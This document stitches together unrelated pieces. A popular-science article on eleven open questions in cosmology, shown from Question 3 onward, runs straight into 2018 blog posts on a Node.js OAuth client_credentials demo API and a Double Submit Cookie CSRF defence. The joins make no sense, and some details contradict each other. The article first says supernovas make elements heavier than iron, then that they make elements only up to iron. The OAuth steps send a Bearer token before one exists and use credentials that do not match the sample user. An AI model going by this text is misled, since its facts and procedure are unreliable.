Two recent discoveries from cosmology prove that ordinary matter and dark matter are still not enough to explain the structure of the universe. There's a third component out there, and it's not matter but some form of dark energy.

The first line of evidence for this mystery component comes from measurements of the geometry of the universe. Einstein theorized that all matter alters the shape of space and time around it. Therefore, the overall shape of the universe is governed by the total mass and energy within it. Recent studies of radiation left over from the Big Bang show that the universe has the simplest shape—it's flat. That, in turn, reveals the total mass density of the universe. But after adding up all the potential sources of dark matter and ordinary matter, astronomers still come up two-thirds short. 

The second line of evidence suggests that the mystery component must be energy. Observations of distant supernovas show that the rate of expansion of the universe isn't slowing as scientists had once assumed; in fact, the pace of the expansion is increasing. This cosmic acceleration is difficult to explain unless a pervasive repulsive force constantly pushes outward on the fabric of space and time. 

Why dark energy produces a repulsive force field is a bit complicated. Quantum theory says virtual particles can pop into existence for the briefest of moments before returning to nothingness. That means the vacuum of space is not a true void. Rather, space is filled with low-grade energy created when virtual particles and their antimatter partners momentarily pop into and out of existence, leaving behind a very small field called vacuum energy. 

That energy should produce a kind of negative pressure, or repulsion, thereby explaining why the universe's expansion is accelerating. Consider a simple analogy: If you pull back on a sealed plunger in an empty, airtight vessel, you'll create a near vacuum. At first, the plunger will offer little resistance, but the farther you pull, the greater the vacuum and the more the plunger will pull back against you. Although vacuum energy in outer space was pumped into it by the weird rules of quantum mechanics, not by someone pulling on a plunger, this example illustrates how repulsion can be created by a negative pressure. 


Question 3 : How were the heavy elements from iron to uranium made?

Both dark matter and possibly dark energy originate from the earliest days of the universe, when light elements such as helium and lithium arose. Heavier elements formed later inside stars, where nuclear reactions jammed protons and neutrons together to make new atomic nuclei. For instance, four hydrogen nuclei (one proton each) fuse through a series of reactions into a helium nucleus (two protons and two neutrons). That's what happens in our sun, and it produces the energy that warms Earth. 

But when fusion creates elements that are heavier than iron, it requires an excess of neutrons. Therefore, astronomers assume that heavier atoms are minted in supernova explosions, where there is a ready supply of neutrons, although the specifics of how this happens are unknown. More recently, some scientists have speculated that at least some of the heaviest elements, such as gold and lead, are formed in even more powerful blasts that occur when two neutron stars—tiny, burned-out stellar corpses—collide and collapse into a black hole.


Question 4 : Do neutrinos have mass?

Nuclear reactions such as those that create heavy elements also create vast numbers of ghostly subatomic bits known as neutrinos. These belong to a group of particles called leptons, such as the familiar electron and the muon and tau particles. Because neutrinos barely interact with ordinary matter, they can allow a direct look into the heart of a star. This works only if we are able to capture and study them, something physicists are just now learning to do. 

Not long ago, physicists thought neutrinos were massless, but recent advances indicate that these particles may have a small mass. Any such evidence would also help validate theories that seek to find a common description of three of the four natural forces—electromagnetism, strong force, and weak force. Even a tiny bit of heft would add up because a staggering number of neutrinos are left over from the Big Bang. 


Question 5 : Where do ultrahigh-energy particles come from?

The most energetic particles that strike us from space, which include neutrinos as well as gamma-ray photons and various other bits of subatomic shrapnel, are called cosmic rays. They bombard Earth all the time; a few are zipping through you as you read this article. Cosmic rays are sometimes so energetic, they must be born in cosmic accelerators fueled by cataclysms of staggering proportions. Scientists suspect some sources: the Big Bang itself, shock waves from supernovas collapsing into black holes, and matter accelerated as it is sucked into massive black holes at the centers of galaxies. Knowing where these particles originate and how they attain such colossal energies will help us understand how these violent objects operate.


Question 6 : Is a new theory of light and matter needed to explain what happens at very high energies and temperatures?

All of that violence cited in question 5 leaves a visible trail of radiation, especially in the form of gamma rays—the extremely energetic cousins of ordinary light. Astronomers have known for three decades that brilliant flashes of these rays, called gamma-ray bursts, arrive daily from random directions in the sky. Recently astronomers have pinned down the location of the bursts and tentatively identified them as massive supernova explosions and neutron stars colliding both with themselves and black holes. But even now nobody knows much about what goes on when so much energy is flying around. Matter grows so hot that it interacts with radiation in unfamiliar ways, and photons of radiation can crash into each other and create new matter. The distinction between matter and energy grows blurry. Throw in the added factor of magnetism, and physicists can make only rough guesses about what happens in these hellish settings. Perhaps current theories simply aren't adequate to explain them.


Question 7 : Are there new states of matter at ultrahigh temperatures and densities?

Under extreme energetic conditions, matter undergoes a series of transitions, and atoms break down into their smallest constituent parts. Those parts are elementary particles called quarks and leptons, which as far as we know cannot be subdivided into smaller parts. Quarks are extremely sociable and are never observed in nature alone. Rather, they combine with other quarks to form protons and neutrons (three quarks per proton) that further combine with leptons (such as electrons) to form whole atoms. The hydrogen atom, for example, is made up of an electron orbiting a single proton. Atoms, in turn, bind to other atoms to form molecules, such as H2O. As temperatures increase, molecules transform from a solid such as ice, to a liquid such as water, to a gas such as steam. 

That's all predictable, known science, but at temperatures and densities billions of times greater than those on Earth, it's possible that the elementary parts of atoms may come completely unglued from one another, forming a plasma of quarks and the energy that binds quarks together. Physicists are trying to create this state of matter, a quark-gluon plasma, at a particle collider on Long Island. At still higher temperatures and pressures, far beyond those scientists can create in a laboratory, the plasma may transmute into a new form of matter or energy. Such phase transitions may reveal new forces of nature. 

These new forces would be added to the three forces that are already known to regulate the behavior of quarks. The so-called strong force is the primary agent that binds these particles together. The second atomic force, called the weak force, can transform one type of quark into another (there are six different "flavors" of quark—up, down, charm, strange, top, and bottom). The final atomic force, electromagnetism, binds electrically charged particles such as protons and electrons together. As its name implies, the strong force is by far the most muscular of the three, more than 100 times as powerful as electromagnetism and 10,000 times stronger than the weak force. Particle physicists suspect the three forces are different manifestations of a single energy field in much the same way that electricity and magnetism are different facets of an electromagnetic field. In fact, physicists have already shown the underlying unity between electromagnetism and the weak force. 

Some unified field theories suggest that in the ultrahot primordial universe just after the Big Bang, the strong, weak, electromagnetic, and other forces were one, then unraveled as the cosmos expanded and cooled. The possibility that a unification of forces occurred in the newborn universe is a prime reason particle physicists are taking such a keen interest in astronomy and why astronomers are turning to particle physics for clues about how these forces may have played a role in the birth of the universe. For unification of forces to occur, there must be a new class of supermassive particles called gauge bosons. If they exist, they will allow quarks to change into other particles, causing the protons that lie at the heart of every atom to decay. And if physicists prove protons can decay, the finding will verify the existence of new forces. 

That raises the next question.


Question 8 : Are protons unstable?

In case you're worried that the protons you're made of will disintegrate, transforming you into a puddle of elementary particles and free energy, don't sweat it. Various observations and experiments show that protons must be stable for at least a billion trillion trillion years. However, many physicists believe that if the three atomic forces are really just different manifestations of a single unified field, the alchemical, supermassive bosons described above will materialize out of quarks every now and then, causing quarks, and the protons they compose, to degenerate. 

At first glance, you'd be forgiven for thinking these physicists had experienced some sort of mental decay on the grounds that tiny quarks are unlikely to give birth to behemoth bosons weighing more than 10,000,000,000,000,000 times themselves. But there's something called the Heisenberg uncertainty principle, which states that you can never know both the momentum and the position of a particle at the same time, and it indirectly allows for such an outrageous proposition. Therefore, it's possible for a massive boson to pop out of a quark making up a proton for a very short time and cause that proton to decay. 


Question 9 : What is gravity?

Next there's the matter of gravity, the odd force out when it comes to small particles and the energy that holds them together. When Einstein improved on Newton's theory, he extended the concept of gravity by taking into account both extremely large gravitational fields and objects moving at velocities close to the speed of light. These extensions lead to the famous concepts of relativity and space-time. But Einstein's theories do not pay any attention to quantum mechanics, the realm of the extremely small, because gravitational forces are negligible at small scales, and discrete packets of gravity, unlike discrete packets of energy that hold atoms together, have never been experimentally observed. 

Nonetheless, there are extreme conditions in nature in which gravity is compelled to get up close and personal with the small stuff. For example, near the heart of a black hole, where huge amounts of matter are squeezed into quantum spaces, gravitational forces become very powerful at tiny distances. The same must have been true in the dense primordial universe around the time of the Big Bang. 

Physicist Stephen Hawking identified a specific problem about black holes that requires a bridging of quantum mechanics and gravity before we can have a unified theory of anything. According to Hawking, the assertion that nothing, even light, can escape from a black hole is not strictly true. Weak thermal energy does radiate from around black holes. Hawking theorized that this energy is born when particle-antiparticle pairs materialize from the vacuum in the vicinity of a black hole. Before the matter-antimatter particles can recombine and annihilate each other, one that may be slightly closer to the black hole will be sucked in, while the other that is slightly farther away escapes as heat. This release does not connect in any obvious way to the states of matter and energy that were earlier sucked into that black hole and therefore violates a law of quantum physics stipulating that all events must be traceable to previous events. New theories may be needed to explain this problem. 


Question 10 : Are there additional dimensions?

Wondering about the real nature of gravity leads eventually to wondering whether there are more than the four dimensions we can easily observe. To get to that place, we might first wonder if nature is, in fact, schizophrenic: Should we accept that there are two kinds of forces that operate over two different scales—gravity for big scales like galaxies, the other three forces for the tiny world of atoms? Poppycock, say unified theory proponents—there must be a way to connect the three atomic-scale forces with gravity. Maybe, but it won't be easy. In the first place, gravity is odd. Einstein's general theory of relativity says gravity isn't so much a force as it is an inherent property of space and time. Accordingly, Earth orbits the sun not because it is attracted by gravity but because it has been caught in a big dimple in space-time caused by the sun and spins around inside this dimple like a fast-moving marble caught in a large bowl. Second, gravity, as far as we have been able to detect, is a continuous phenomenon, whereas all the other forces of nature come in discrete packets.

All this leads us to the string theorists and their explanation for gravity, which includes other dimensions. The original string-theory model of the universe combines gravity with the other three forces in a complex 11-dimensional world. In that world—our world—seven of the dimensions are wrapped up on themselves in unimaginably small regions that escape our notice. One way to get your mind around these extra dimensions is to visualize a single strand of a spiderweb. To the naked eye, the filament appears to be one dimensional, but at high magnification it resolves into an object with considerable width, breadth, and depth. String theorists argue that we can't see extra dimensions because we lack instruments powerful enough to resolve them. 

We may never see these extra dimensions directly, but we may be able to detect evidence of their existence with the instruments of astronomers and particle physicists. 


Question 11 : How did the universe begin?

If all four forces of nature are really a single force that takes on different complexions at temperatures below several million degrees, then the unimaginably hot and dense universe that existed at the Big Bang must have been a place where distinctions between gravity, strong force, particles, and antiparticles had no meaning. Einstein's theories of matter and space-time, which depend upon more familiar benchmarks, cannot explain what caused the hot primordial pinpoint of the universe to inflate into the universe we see today. We don't even know why the universe is full of matter. According to current physics ideas, energy in the early universe should have produced an equal mix of matter and antimatter, which would later annihilate each other. Some mysterious and very helpful mechanism tipped the scales in favor of matter, leaving enough to produce galaxies full of stars.

Fortunately, the primordial universe left behind a few clues. One is the cosmic microwave background radiation, the afterglow of the Big Bang. For several decades now, that weak radiation has measured the same wherever astronomers looked at the edges of the universe. Astronomers believed such uniformity meant that the Big Bang commenced with an inflation of space-time that unfolded faster than the speed of light. 

More recent careful observation, however, shows that the cosmic background radiation is not perfectly uniform. There are minuscule variations from one small patch of space to another that are randomly distributed. Could random quantum fluctuations in the density of the early universe have left this fingerprint? Very possibly, says Michael Turner, chairman of the astrophysics department at the University of Chicago and chairman of the committee that came up with these 11 questions. Turner and many other cosmologists now believe the lumps of the universe—vast stretches of void punctuated by galaxies and galactic clusters—are probably vastly magnified versions of quantum fluctuations of the original, subatomic-size universe. 

And that is just the sort of marriage of the infinite and the infinitesimal that has particle physicists cozying up to astronomers these days, and why all 11 of these mysteries might soon be explained by one idea. 



Real Question : How Did We Get Here?


Astronomers cannot see all the way back in time to the origin of the universe, but by drawing on lots of clues and theory, they can imagine how everything began. 

Their model starts with the entire universe as a very hot dot, much smaller than the diameter of an atom. The dot began to expand faster than the speed of light, an expansion called the Big Bang. Cosmologists are still arguing about the exact mechanism that may have set this event in motion. From there on out, however, they are in remarkable agreement about what happened. As the baby universe expanded, it cooled the various forms of matter and antimatter it contained, such as quarks and leptons, along with their antimatter twins, antiquarks and antileptons. These particles promptly smashed into and annihilated one another, leaving behind a small residue of matter and a lot of energy. The universe continued to cool down until the few quarks that survived could latch together into protons and neutrons, which in turn formed the nuclei of hydrogen, helium, deuterium, and lithium. For 300,000 years, this soup stayed too hot for electrons to bind to the nuclei and form complete atoms. But once temperatures dropped enough, the same hydrogen, helium, deuterium, and lithium atoms that are around today formed, ready to start a long journey into becoming dust, planets, stars, galaxies, and lawyers. 

Gravity—the weakest of the forces but the only one that acts cumulatively across long distances—gradually took control, gathering gas and dust into massive globs that collapsed in on themselves until fusion reactions were ignited and the first stars were born. At much larger scales, gravity pulled together huge regions of denser-than-average gas. These evolved into clusters of galaxies, each one brimming with billions of stars. 

Over the eons fusion reactions inside stars transformed hydrogen and helium into other atomic nuclei, including carbon, the basis for all life on Earth. 

The most massive stars sometimes exploded in energetic supernovas that produced even heavier elements, up to and including iron. Where the heaviest elements, such as uranium and lead, came from still remains something of a mystery. 



Wednesday, May 9, 2018

WebApp RESTful API

I have created an authorization server and a resource server in a single API. For demonstration purposes there is an endpoint you can call to retrieve the resources.
This is written using node.js, so to run it on your computer you need node.js installed.

app.js

As you can see, the OAuth grant type I have used is client_credentials. This has to be stated in the request body when you request the access token from the authorization server.
Also, this app runs on port 4000; you can use any port number here.
I have created two endpoints: one to get the access token, "/oauth/token", and the other to get the resources, "/profile".
As the resource I have hard coded one value, the name ("Waas"), which is returned as a JSON object.

model.js


Here I have created a sample user (username = admin, password = admin), and all the functions that handle requests from the client are written in this file.

Run the app.js file.


To make all GET and POST requests to the resource server we use the RESTClient add-on for Mozilla Firefox. You can use other similar tools such as Postman for this.

First of all, we have to make a POST request to get the access token from the authorization server.
For that we have to send the authorization key in the header.

Authorization : Bearer XXXXXXXXXXXXXXX

We also have to set the content type in the header.

I'll demonstrate with RESTClient on Mozilla Firefox, creating all the requests manually, and of course how to retrieve the resources.


Then we have to include these 3 parameters in the body.
username=test
password=test
grant_type=client_credentials

The URL should be the endpoint that gives us the access token.

http://localhost:4000/oauth/token 


When we send this we get a response with the access token in it. This access token also has an expiration time.

Then we have to make a GET request to retrieve the resources we need.



Now our URL is different because we have to call a different endpoint to get these resources, which is "http://localhost:4000/profile".
We do not have to put anything in the body.
In the request header we should send the access token we got in the previous step.

Authorization: Bearer XXXXXXXXXXXXXXX

Make sure that the access token has not expired. Otherwise you will get an error message saying that it has expired.

When you send this request you get a response that contains the resources we specified in the code.

Find the Source code from here.

Double Submit Cookies

Cross-site Request Forgery protection in web applications via the Double Submit Cookie pattern.


In the previous blog post I described the Synchronizer Token Pattern, which can be applied as a prevention method for Cross-Site Request Forgery (CSRF). In this blog post I will share some knowledge on another CSRF prevention technique, the Double Submit Cookie pattern.


According to Wikipedia, Double Submit Cookie is defined as sending a random value both in a cookie and as a request parameter, with the server verifying that the cookie value and the request value match. 

Sample Demonstration

As in the previous blog post, I created a simple login form with hard-coded user credentials.


Upon login, I generate a session identifier and set it as a cookie in the browser. At the same time I generate the CSRF token for the session and set it as a cookie in the browser.

After a successful login it redirects you to another page which contains a form to be filled in.

When the form is submitted to the action, the CSRF token cookie is sent along, and the CSRF token value is also submitted in the form body.

In the web page that accepts the form submission (the URL of the action), obtain the CSRF token received in the cookie and the one in the message body. Compare the two values and, if they match, show a success message; if not, show an error message.


You can find the source code from here.
